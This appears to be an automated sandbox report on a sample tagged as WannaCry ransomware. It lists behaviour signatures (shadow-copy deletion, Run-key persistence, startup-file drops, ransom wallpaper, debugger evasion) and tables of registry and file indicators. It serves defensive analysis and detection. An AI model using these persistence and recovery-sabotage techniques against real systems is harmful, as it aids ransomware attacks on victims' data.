Analysis Overview
SHA256
b10c01a7256143b3abb1d6fe2115ecd651fe639bccadaf3dd88d1d68e1bf50c4
Threat Level: Known bad
The file 04e16c855515880799c8.exe was found to be: Known bad.
Malicious Activity Summary
Wannacry
Wannacry family
Deletes shadow copies
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
Modifies file permissions
Executes dropped EXE
Drops startup file
Checks computer location settings
Loads dropped DLL
Mark of the Web detected: This indicates that the page was originally saved or cloned.
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Checks system information in the registry
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Modifies registry class
Suspicious use of SendNotifyMessage
Uses Volume Shadow Copy WMI provider
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Modifies registry key
Uses Task Scheduler COM API
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 23:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 23:13
Reported
2024-11-10 23:27
Platform
win10ltsc2021-20241023-en
Max time kernel
804s
Max time network
805s
Command Line
Signatures
Wannacry
Wannacry family
Deletes shadow copies
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD9ACA.tmp | C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD9AE1.tmp | C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pdyantnatxy168 = "\"C:\\Users\\Admin\\Downloads\\Ransomware.WannaCry\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
Checks installed software on the system
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Mark of the Web detected: This indicates that the page was originally saved or cloned.
| Description | Indicator | Process | Target |
| N/A | https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Russian.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-ML3ON.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-HQJ2N.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-BL1GI.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Korean.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-VJVU5.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-NIJF7.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Spanish.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Polish.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-1BMBE.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-JLO0I.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-8EIJO.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Italian.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-6MNV6.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-KJVN7.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Danish.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-5DMU1.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-R5RGM.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-MATBC.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-SB0GC.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Settings.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\HDMSchedule.exe | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-N4KHG.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-BILJT.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-SQ2IL.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-2Q53O.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-MA649.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-78609.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\7z.dll | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-J04SN.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-6JUGP.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Norwegian.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-V3P36.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-FCHBE.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-L06EB.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\German.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-QTURA.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-BRQQL.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-GR5R3.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-HIAB0.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\English.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Swedish.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-QPVBU.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-M92E9.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-VBO9I.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-74GF2.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\PlayaSDK.dll | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-OR2S7.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-RC6DT.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Dutch.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\6b8484da-22c6-429d-8149-c1d3d7c86ca1.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241110231455.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\stub64.exe | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-11AFR.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-UFKNB.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-V48L3.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Brazilian.ini | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-TQH4R.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-GHOD5.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| File created | C:\Program Files (x86)\PC HelpSoft Driver Updater\is-6T576.tmp | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\INF\c_volume.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\INF\c_monitor.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\INF\c_media.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\INF\c_diskdrive.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\INF\c_display.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File created | C:\Windows\INF\c_processor.PNF | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Driver_Updater_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-BCPKK.tmp\Driver_Updater_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4LCAM.tmp\Driver_Updater_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Driver_Updater_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Driver_Updater_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpCC1B.tmp_collect\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\ | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0004 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
